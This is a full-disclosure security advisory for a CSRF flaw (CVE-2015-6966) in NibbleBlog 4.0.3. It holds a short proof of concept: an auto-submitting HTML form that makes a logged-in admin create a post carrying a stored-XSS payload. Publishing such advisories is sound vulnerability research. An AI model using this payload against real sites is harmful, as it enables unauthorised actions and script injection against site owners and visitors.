NibbleBlog 4.0.3: CSRF
Date: 2015-09-01 10:34:191. Introduction
| Affected Product: | NibbleBlog 4.0.3 |
| Fixed in: | not fixed |
| Fixed Version Link: | n/a |
| Vendor Contact: | Website: http://www.nibbleblog.com/ |
| Vulnerability Type: | CSRF |
| Remote Exploitable: | Yes |
| Reported to vendor: | 07/21/2015 |
| Disclosed to public: | 09/01/2015 |
| Release mode: | Full Disclosure |
| CVE: | CVE-2015-6966 |
| Credits | Tim Coen of curesec GmbH |
2. Vulnerability Description
NibbleBlog 4.0.3 does not have CSRF protection. This means that an attacker can perform actions for an admin if the admin is logged in and visits an attacker controlled website. In the case of NibbleBlog, this can for example lead to persistent XSS via the creation of a new post, which in turn allows for phishing attacks or the injection of JavaScript keyloggers.
3. Proof of Concept
Create new Post (for Spam and XSS):
<form id="myForm" action="http://localhost/nibbleblog/admin.php?controller=post&action=new_simple" method="POST">
<input name="title" value="Interesting!">
<input name="content" value="visit <a href='http://example.com'>this</a>.<img src='no' onerror='alert(1)'>">
<input name="allow_comments" value="1">
<input name="id_cat" value="0">
</form>
<script>
document.getElementById("myForm").submit();
</script>
4. Solution
This issue was not fixed by the vendor.
5. Report Timeline
| 07/21/2015 | Informed Vendor about Issue |
| 07/22/2015 | Vendor Replied |
| 08/18/2015 | Reminded Vendor of release date (no reply) |
| 09/01/2015 | Disclosed to public |